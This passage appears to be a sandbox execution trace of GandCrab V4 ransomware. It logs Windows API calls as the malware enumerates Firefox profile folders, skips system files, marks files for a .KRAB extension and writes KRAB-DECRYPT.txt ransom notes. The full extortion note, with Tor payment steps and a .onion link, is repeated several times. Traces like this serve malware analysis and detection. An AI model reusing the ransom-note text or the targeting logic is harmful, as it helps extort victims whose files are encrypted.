vyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.579] WriteFile (in: hFile=0x474, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.580] CloseHandle (hObject=0x474) returned 1 [0076.580] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.581] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.581] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x30d)) [0076.581] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.581] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.581] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.582] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a08d2ca4dee3d.lock") returned 80 [0076.582] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\extensions\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x474 [0076.583] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.583] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.583] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 57 [0076.583] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0076.583] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x1023538 [0076.583] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.584] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.584] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.584] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.584] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.584] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.584] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.584] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a08d2ca4dee3d.lock" [0076.584] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.584] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 85 [0076.584] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\d2ca4a08d2ca4dee3d.lock") returned 80 [0076.584] lstrlenW (lpString=".lock") returned 5 [0076.584] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.585] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.585] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.585] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.585] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.585] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0076.585] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0076.585] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\KRAB-DECRYPT.txt" [0076.585] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.586] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\KRAB-DECRYPT.txt.KRAB") returned 78 [0076.586] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\KRAB-DECRYPT.txt") returned 73 [0076.586] lstrlenW (lpString=".txt") returned 4 [0076.586] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.586] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0076.586] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.586] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\KRAB-DECRYPT.txt") returned 73 [0076.587] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Extensions\\KRAB-DECRYPT.txt") returned 73 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0076.587] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0076.587] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.587] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0076.587] FindClose (in: hFindFile=0x1023538 | out: hFindFile=0x1023538) returned 1 [0076.587] CloseHandle (hObject=0x474) returned 1 [0076.588] FindNextFileW (in: hFindFile=0x1023378, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0076.588] lstrcmpW (lpString1="Firefox", lpString2=".") returned 1 [0076.588] lstrcmpW (lpString1="Firefox", lpString2="..") returned 1 [0076.588] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\", lpString2="Firefox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox" [0076.588] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\" [0076.588] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.588] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.588] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.588] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.588] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.588] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.589] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.589] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\\\KRAB-DECRYPT.txt") returned 71 [0076.589] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0076.590] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.590] WriteFile (in: hFile=0x474, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.590] CloseHandle (hObject=0x474) returned 1 [0076.591] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.591] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.591] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x31d)) [0076.591] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.592] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.592] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.592] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a08d2ca4dee3d.lock") returned 77 [0076.592] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x474 [0076.594] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.594] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.594] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 54 [0076.594] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*" [0076.594] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x10234f8 [0076.594] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.594] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.594] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.595] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.595] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.595] lstrcmpW (lpString1="Crash Reports", lpString2=".") returned 1 [0076.595] lstrcmpW (lpString1="Crash Reports", lpString2="..") returned 1 [0076.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Crash Reports" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0076.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0076.595] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.595] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.595] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.595] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.595] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.595] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.596] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.596] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\KRAB-DECRYPT.txt") returned 85 [0076.596] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0076.598] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoN